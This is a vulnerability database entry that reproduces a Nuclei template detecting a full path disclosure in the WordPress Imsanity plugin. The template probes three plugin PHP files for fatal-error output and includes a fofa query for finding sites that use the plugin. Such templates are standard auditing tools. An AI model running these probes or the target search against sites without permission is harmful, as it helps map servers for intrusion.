漏洞描述
WordPress Imsanity plugin is vulnerable to full path disclosure via direct access to plugin files.
wordpress-imsanity-fpd: WordPress Plugin Imsanity - Full Path Disclosure
PoC代码[已公开]
id: wordpress-imsanity-fpd
info:
name: WordPress Plugin Imsanity - Full Path Disclosure
author: ritikchaddha
severity: low
description: |
WordPress Imsanity plugin is vulnerable to full path disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
verified: true
max-request: 3
vendor: developer
product: imsanity
framework: wordpress
fofa-query: body="/wp-content/plugins/imsanity/"
tags: wp,wordpress,wp-plugin,fpd,imsanity,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/imsanity/libs/imagecreatefrombmp.php"
- "{{BaseURL}}/wp-content/plugins/imsanity/ajax.php"
- "{{BaseURL}}/wp-content/plugins/imsanity/settings.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Fatal error"
- "plugins/imsanity"
- "Uncaught Error:"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204c27646bb32460cef71534320224f9347da1709c548589532794559af850df9b022060a52fa46566e764f38bab40c350ebd52a2644e8c421dbb00dbeb9ac6dae78cf:922c64590222798bb761d5b6d8e72950